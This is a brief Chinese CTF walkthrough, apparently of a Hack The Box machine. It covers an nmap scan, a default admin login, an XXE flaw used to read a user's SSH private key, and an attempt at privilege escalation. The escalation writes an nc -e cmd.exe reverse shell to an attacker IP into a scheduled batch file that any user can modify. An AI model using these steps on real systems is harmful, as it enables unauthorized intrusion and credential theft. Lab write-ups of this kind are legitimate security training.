0x01信息收集
nmap 常规扫一波
开了80 22 443 端口
0x02 先看看80端口
除了一个登录页面啥也没有
admin
password
成功登录
在这个order 的地方 使用xml传订单。可能存在XXE,xxe是没有对外部实体的安全性验证而导致恶意外部实体被执行,可能导致lfi或者RCE
是存在XXE的
在返回包里看见了疑似账号的名字daniel
又开了22端口 我们可以去读取目标的私钥
地址是c://User/daniel/.ssh/id_rsa
成功了 我们可以通过ssh登录了
将私钥保存为id_rsa
ssh -i id_rsa daniel@10.129.183.135
在桌面看见userflag
C盘根目录下看见一个 Log-Management文件夹 进去看 是个脚本
type一下 发现是清理日志用的
这里用powershell ps了一下 发现了之前那个进程 可能有定时任务什么的
icacls 查看文件权限 显示BUILTIN \ Users组具有对该文件的完全控制(F)。 BUILTIN \ Users组代表所有本地用户,其中也包括Daniel
传一个nc过去 将nc连接语句写入job.bat 并执行
echo c:\Log-Management\nc.exe -e cmd.exe 10.1
0.14.26 1234 > c:\Log-Management\job.bat & job.bat
获取不到administrator权限,寄!